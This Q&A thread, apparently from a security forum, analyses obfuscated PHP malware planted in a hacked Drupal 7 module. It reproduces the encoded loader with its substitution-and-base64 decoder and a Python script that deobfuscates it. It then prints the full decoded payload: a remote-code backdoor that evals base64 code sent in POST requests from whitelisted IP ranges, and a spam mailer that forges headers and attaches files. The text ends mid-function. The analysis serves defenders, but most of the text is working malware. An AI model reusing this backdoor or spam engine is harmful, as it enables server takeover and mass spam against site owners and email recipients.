'Sp3SYgGjYf4SYgGjYGPjYgGjH7ePYgmJeRKt8RQ8KEwW8gUUip4dKWG'.
'XYfK2UfwW8AkBlaNpmp3SYgGjYGPjYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3'.
'd87w4HBcOKr4XYgOjKfktbz1Vbr3d87w4HBcOKr4jixGPHRQM9RlPKf'.
'ktbz1Vbr3d9B14exUUSxezHRQueRKWeROPKfktbz1Vbr3d9B14exUUSxOjiWGdahcpwg'.
'bjCAGdm4waKM3SYgGjYgmJeRKt8RQ8Ksr2UBtn9gUUYy4jbEmWUBcrbfk2bAjOb'.
'B1We7rM7WUV9RmP8sldRxOTgAGjYgkX9AjjYxkX82ctbdKtoxjObB1We7rM7WUV9R'.
'mP8sldRxJjeRKWeROPK4U1wgb3YgUlprQaKWOXYgOjbzw4URKvYh9kp1Q1CWGSYgGjYGPjYgGj6WPj4K/mj'.
'QgZ466lnVg4460lngymjUBk4enlvcgD4e5j46Yj46/mjQgJ466lvQgT4eMlnUB646Oj466'.
'lvQg4YgPngAGjYgGOURK3Yy4jbB1WbswuURK3SgmJeRKt8RQ8KEwW8gUUSp3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KEQ0HBwV9xU'.
'USxGXYgmrbzN8KEQ0HBwV9xUUYy4jKst4UfGdCJPjYgGjH7ePYghjHRQM9RlPKfwW813dbB14HgUUSxGXYgmrbzN8K'.
'EktUBjdRxGcYgbnKM3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KstnbEldRxOjKAejHRQM9RlPKfwW813dbB14HgUU'.
'SxGXgAGjYgkTgAGjYgGjYgGjH7ePYfQ4bdknbWjOURK37WUJeRmPKr43YgbnKWOjSlPjYgGjYgGjYf'.
'3SYgGjYgGjYgGjYgGjKfwW813dHBcMUgUUYy4jbEwAbEmWSgmrbzN8KEktUBjdRxJ'.
'j5gJjbEmWbBcMSgmrbzN8KEktUBjdRxJjKWFdSxOTgAGjYgGjYgGjY'.
'gGjYgmrbzN8KEktUBjdRxGcYfQredQ4bAjOURK37WUJeRmPKr43YfQ4bdknbWjOURK37'.
'WUJeRmPKr43YgbnKWOXCJPjYgGjYgGjYf4SYgGjYgGjYgk28fQ2gAGjYgGjYgGjoJPjYgGjYgGjYgGjYgGOU'.
'RK37WUP8EQ4Kr4jixGOURK37WUJeRmPKr4TgAGjYgGjYgGjYgGjYgmrbzN8KEktUBjdRxGcYgbnKM3KgAGjYgGjYgGjulP'.
'jYgGjulPjYgGjKfwW813dbB14HgUUYy4jbfK29rcW9Rk3e7Q2SgYn7rNb6r4q6WY3YgYnYAJjKfwW813dbB14HgUUSp3S'.
'YgGjYB2zSgkXbEQ2UgjOURK37WUNU7wWoxUUSxGXYgmrbzN8KEktUBjdRxGv'.
'ixGAiE3OURK37WUNU7wWoxUUuxYTgAGjYgGSYgGjYgmJ8EK4Yy4jHR'.
'QM9RlPKfktbz1Vbr3dbBcWUgUUSxG/YgmJeRKt8RQ8KEknbdldRlPjYgGjYgGjYgGjYgGDYgjjHRQM9RlPKfwW813dbBc'.
'WUgUUSxG/YgmrbzN8KEknbdldRxGDYgjOURK37WUMest287adRp4cKst4UfkMKMF4Qy5DCyGXYgOTgAG'.
'jYgGSYgGjYgm4H7r28Ew4Yy4jHRQM9RlPKfktbz1Vbr3dUB2V97crUgUUSxG/YgmJeRKt8RQ8KEmX87wnURldRxGDYy5JCJP'.
'jYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3dbzw4URKvKr4XYgOjKfktbz1Vbr3dbzw4URKvKr4jixGdescvUBwvUgbTgAGjYgGS'.
'YgGjYgmMest287ajixGOURK37WUMest287adRp4cKst4UfkMKWG/YgUMbsJD6WFdCAbdCJPjYgGjKB9JYy4jlB'.
'9M8sQq8Ek28AjObsQP97r26AmrbzN8KstnbEldRxJjKfknbdl3Ygm2bdKv8WJjKBwWbdQ4bAJjKfmX87wnURlXCJPjYgG'.
'jH7ePYgmzbgGXgAGjYgkTgAGjYgGjYgGj6WPjp7cDH7N3exGI6JPjYgGjYgGjYB2zSgGtYB2Mbsw4SgmJe'.
'RKt8RQ8KrwM9RYVl7U28dldRxOjSxGObB1We7rM7WUwbswW6a1d97L4Kr4jixGAp7cDH7'.
'N3exFr60GjSB2lHBcv9p3jwp3jlrkwYB2lHBcv9xkiaWGMRMGj8B2q9xkQe75jpr5j7y3j97Z'.
'VUR5XYh1JbBN2wswAxs246MaWCgZNCgGPx4tapaJ3YBNXHsajmsw0HsFXY192bdQX8sZnQgZJYhrnez2'.
'39xFElp545xkpe79tbzOnQpYZ60hsY03SYgGjYgGjYgGSYgGjYgGjYgGObzwNU7'.
'wMUgGcYgKTKfktbz1Vbr3d87w4HBcOKrrcYf3OURK37WUJeRmPKrrcYhtaw1Gn5xZJRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jYOtnbElDYf3OURK37WUP8EQ4KrrcRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jY2wM9RYVl7U28dlDYf3ObB1We7rM7WUwbswW6a1d97L4KrrcYAZARfKb8AYT'.
'gAGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KEK29zwW9RYdRxOjSxGObzwNU7wMUg'.
'GvixGAazwz9RK2b0PjoWmJeRKt8RQ8KEK29zwW9RYdRRrbb2NvY03SYgGjYgGjYgkX9AjjHRQM9'.
'RlPKfktbz1Vbr3descnHs22Kr4XYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgm08scqH7ajixGAY03SYgG'.
'jYgGjYgGjYgGjH7ePYB2MRs1Wbz1LSgmJeRKt8RQ8KsQn8sVX9xUUSxGXYfVz8EK2e7QPSgGObB1We7r'.
'M7WU08scqH7adRxktbWGOHM4+KfejSxGOescnHs22YgZcYgYOHM4OU03jY03jKBQn8sVX'.
'9xGcYfQredQ4bAjOescnHs226yG36pYXCE4SYgGjYgGjYgGjYgGj97NM9xGOescnHs22Yy'.
'4jKfktbz1Vbr3descnHs22Kr4TgAGjYgGjYgGjYgGjYB2zSgGOescnHs22Yp4dKWGXYgmW9R1r9RQ4YgZcYgKy8scqH7aD'.
'Ygm08scqH7wbb2NvY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jYOQn8zL2eEmX8sZDYBQ38EQ2RfKb8AYT'.
'gAGjYgGjYgGjH7ePYgmJeRKt8RQ8Ksr2UBtn9gUUip4dahcpwgbjSlPjYgGjYgGjY'.
'f3SYgGjYgGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KsmtUBhdRxOjKAejHRQueRKWeROPKfk'.
'tbz1Vbr3d9B14exUUSxGXgAGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgGjYgGjYB9nbzwtesjPKfktbz'.
'1Vbr3d9B14exUUYh1pYgmqYy4+YgmsSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgmOeRmtYgZcYfwW8BwvescO9xjO'.
'HWOvKM4d6dwW8BwvescO9xjOUAOvKWedCJPjYgGjYgGjYgGjYgGjYgGjH7ePYfQredQ4bAjO9B14ex'.
'Jj6phXip4dKAbjSxGO9B14exGcYfQredQ4bAjO9B14exJJ6g4NSp3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGO9B14ex'.
'GvixGARfKb82NWRBZACJPjYgGjYgGjYgGjYgGSYgGjYgGjYgGjYgGjKfK2bRw2bElj604jYOQn8dm28dlVUf2'.
'J9pPjeRkJ8B20eRmX8sZnogrEUEbV9zcW8xrrbzN28zQn9BwORfKb8AYTgAGjYgGjYgGjYg'.
'GjYgmW9R1r9RQ4YgZcYgKy8sL497L467N28zU4HyPjYALMUfK397ZPKBmtUBhX6AKbb2N'.
'vY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jY2NWRBZACJPjYgGj'.
'YgGjYGPjYgGjYgGjYB2zSgGObB1We7rM7WUV9RmP8sldRxGcixGdahcpwgbjSxGObzwNU7wMUgGvixG'.
'O9B14ep3SYgGjYgGjYgGSYgGjYgGjYgkG9dUWHRm2YgjO9dG3KfK2'.
'bRw2bElXCWGnSAkp97LOYfK2bRw2bEljSAFSYgGjYgGjYgGSYgGjYgGjYgGObz'.
'wMYy4jYAYTYgmP971O9RKMYy4jYAYTYgmPRsm2UBw0UBwOYy4j9z13bsaTgAGjYgGjYgGjUstX8BaPYg1G9zwn'.
'9AjO9dGXYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgmW9R5j604jlB9W971OS'.
'gmzbgJj5pGWQgOTYgFIYQBf460mjVgJ46RlngylvVg+46EmjVg'.
'r46EmjAGI6JPjYgGjgAGjYgGjYgGjYgGjYgFIYQgu4eylnVgW46RmjQgD46Gj46El3QgT'.
'460mtcgZ4eFj46ul3QgM46nlnVgW46qlnVgWYQgWYQgD46TlnUBg46RlnUBg46ajSAFSY'.
'gGjYgGjYgGjYgGjH7ePYghjKBtu9Bw497Q497ljKAejbEmWbBcMSgmW9R53YgKbb2NvRfKb8'.
'AYXYp4cmO15a4ajSlPjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGnSAylVcgJ46ilnVgT46Tl3VgD46jj4'.
'eilVVgrYQBk4eulvQBg46ylnUB6Yg4j46qlnVBG4eylVUgD4e6lvQBG4eilVUgFYQgD46TlnUBg46RlnUBgYg'.
'PngAGjYgGjYgGjYgGjYgGjYgGOH1cO9Rm2eEm29gGcYfmWU7aTgAGjYgGjYgGjYg'.
'GjYgGjYgGSYgGjYgGjYgGjYgGjYgGjYgmP971O9RKMYy4jbEwAbEmWSgmW9R53YyG3YfQ4bdknbWjObzwM6gG'.
'ARfKb82NWRBZASxOTgAGjYgGjYgGjYgGjYgGjYgGObzwMYy4jbEwAbEmWSgmW9R53YfQ4bdknbWjObzwM6gGARfKb82NWRBZAS'.
'x34Sp3SYgGjYgGjYgGjYgGjYgGjYGPjYgGjYgGjYgGjYgGjYgGj6WPjxBwt9Bw'.
'WbWk48WkkbdKtoxGI6JPjYgGjYgGjYgGjYgGjYgGjH7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4dHBwt9BwWbWbjufJjKfktbz1Vb'.
'r3dbzw4URKvKr4cixUtbdKtoxbSYgGjYgGjYgGjYgGjYgGjYgGjYgkFugGPHRQM9RlPKfkt'.
'bz1Vbr3dbzwOHRK2eEldRxOjKAejKfktbz1Vbr3dbzwOHRK2eE'.
'ldRp4cUfKr9xOjSlPjYgGjYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgmPYy4j9RtJ8BcO9xjARfKb8AY3Yg'.
'mP971O9RKMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGOHBwt9BwWbWGcYB1Wbz1LSgOTgAGjYgGjYgGjYg'.
'GjYgGjYgGjYgGj9zcW9710HgjjKBjjeR5jKB3ciAmsYgOSYgGjYgGjY'.
'gGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgk'.
'MUfKJ8E5PKfe3YgbDKWOjSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgGOHWGcYfQredQ4bAjOUAJj5gJjbEmWbBcMSgms6gGdCAbXSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjY'.
'gGjYgmsYy4jUfKX8xtMU7KMUfYPKfe3YfQ4bdknbWjOUAJjKMPdSx3NSxOTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgG'.
'jYf4SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjKBt2e7m2bdQ8bEmWUBcrbfk2bAjOHW2UYy4jKfeTgAGjYgGjYgGjYgG'.
'jYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjH7ePYB2Mb'.
'sw4SgmJeRKt8RQ8KEK29B2W97Q4Kr4XYgezYgmJeRKt8RQ8KEK29B2W97Q4Kr4ciRmWU7ajKAejH'.
'RQM9RlPKBt2e7m2bdQ8K4Nil41axacCKr4XYgOSYgGjYgGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgG'.
'jYgGjYgGjYgGObB1We7rM7WUrbzJdRxGcYgmP971O9RKM7WU5p4Qkwh2ipAUUCJ'.
'PjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgGtHRQM9RlPKfktbz1Vbr3dbzwOHRK2eEl'.
'Vescr8dldRxOjSxGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUYy4j5y3SYgGjYgG'.
'jYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzwOHRK2eElVescr8dldRpJN5gGXgAGjYgGjYgGjYgGjYgGj'.
'YgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUS'.
'W3TgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgmzU7L0Yy4jRrcBwaLywh2ip2cuCJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgkW9RmrbzZjlB2MRscAHzw0UgjOUBtXbWOjiWGOUBtXbW4+KB9r8'.
'z5PKfktbz1VbWOjCAGO9dwveWjObB1We7rMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgk'.
'cgAGjYgGjYgGjYgGjYgGjYgkcgAGjYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzw4URKvKr4cixUP971O9RKMKWGXYfK2'.
'UfwW8AGOHBwt9BwWbM3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYf4SYgGjYgGjYgGSYgGjYgGjYgkG9zQ38EQ2SgmzbgOTgA'.
'GjYgkcgAGjYgk28fQ2YfK2UfwW8AkBlaNpmp3nSAGO9RKWbEmW6Am2bdKv8M3jSAFSYgGjYGPjYgGjH'.
'7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4deRKWeROdYgOjKfK2bWGcYB1Wbz1LSgUP971O9RKMKM4+KBt2e7'.
'm2bd53YgU08sL497L4KM4+KfK2bWOTgAGjYgGSYgGjYfK2UfwW'.
'8AGObzwMCJXc';
eval(v78ZFAX($vFHLJ89, $vIIJ30Y));?> I believe it was used for sending the spams such us: To: <[email protected]>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code But how? What's the method of its action? A bit of more background: It was found in Drupal 7 instance at sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php , however the file and code can vary depending on the hack. One user reported it in sites/all/modules/i18n/i18n_block/stats7.php and the content of this script was a bit different: <?php
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'. | The last line performs an eval() of function v78ZFAX() given the two parameters like so: eval(v78ZFAX($vFHLJ89, $vIIJ30Y)); That first parameter is the part that takes up the bulk of the code. It is assigned all that random-looking garbage, with . concatenating all those strings together into one long string: $vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk' ... The second parameter is this array, which maps certain letters/numbers to other letters/numbers: $vIIJ30Y = Array(
'1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m'); The function itself can be re-written as this for clarity: function v78ZFAX($vJOJJ7T, $vRJ8WGX)
{
$vM74216 = '';
for($i=0; $i < strlen($vJOJJ7T); $i++)
{
$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];
}
return base64_decode($vM74216);
} It starts by declaring a blank variable vM74216 and then for each digit of the first variable (the super long one) it adds a character to this currently-blank variable. The digit it adds depends on the outcome of the ternary condition used by the isset() function, which simply checks to see if that i-th digit of the huge number has a corresponding lookup entry in the character mapping array. At the end of it all, it Base64 decodes the resultant variable, which gets passed as the derived parameter of the initial eval() function. The whole point is obfuscation. It looks like a jumbled mess, but characters get swapped, concatenated, etc. until its payload is unleashed. This is done to prevent an analyst from immediately knowing the nature of the script, as well as bypassing signature-based antivirus techniques. EDIT Using this hack of a Python script (I'm just more comfortable in Python): import base64
TheArray = {'1':'F', '0':'j', '3':'s', '2':'l', '5':'M', '4':'0', '7':'W', '6':'L', '9':'Z', '8':'b', 'A':'i', 'C':'O', 'B':'G', 'E':'3', 'D':'6', 'G':'A', 'F':'8', 'I':'q', 'H':'a', 'K':'J', 'J':'w', 'M':'z', 'L':'5', 'O':'k', 'N':'x', 'Q':'N', 'P':'o', 'S':'K', 'R':'X', 'U':'d', 'T':'7', 'W':'y', 'V':'t', 'Y':'I', 'X':'p', 'Z':'4', 'a':'U', 'c':'9', 'b':'c', 'e':'Y', 'd':'n', 'g':'C', 'f':'H', 'i':'P', 'h':'E', 'k':'B', 'j':'g', 'm':'R', 'l':'Q', 'o':'e', 'n':'v', 'q':'r', 'p':'T', 's':'2', 'r':'1', 'u':'f', 't':'h', 'w':'V', 'v':'u', 'y':'D', 'x':'S', 'z':'m'}
LongVar = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'+'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'+'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'+'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'+'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'+'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'+'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'+'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'+'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'+'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'+'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'+'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'+'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'+'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'+'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'+'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'+'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'+'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'+'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'+'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'+'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'+'t8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'+'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'+'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'+'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'+'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'+'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'+'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'+'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'+'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'+'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.... TRIMMED FOR SE ANSWER CHAR COUNT
NewVar = ''
for i in LongVar:
if i in TheArray:
NewVar += TheArray[i]
else:
NewVar += i
print base64.b64decode(NewVar) I was able to derive the obfuscated payload as: if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
eval(base64_decode($_POST["code"]));
exit();
}
if (isset($_POST["type"]) && $_POST["type"]=="1")
{
type1_send();
exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{
}
elseif (isset($_POST["type"]))
{
echo $_POST["type"];
exit();
}
error_404();
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
function type1_send()
{
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
)
{
exit();
}
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
if(empty($emails))
{
exit();
}
foreach ($emails as $fteil => $email)
{
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
if (strstr($from, "[CUSTOM]") == FALSE)
{
$from = from_host($from);
}
else
{
$from = str_replace("[CUSTOM]", "", $from);
}
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
}
function send_mail($from, $to, $subj, $text, $mailer)
{
$head = "";
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
if(@mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
function alter_macros($content)
{
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
function text_macros($content)
{
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
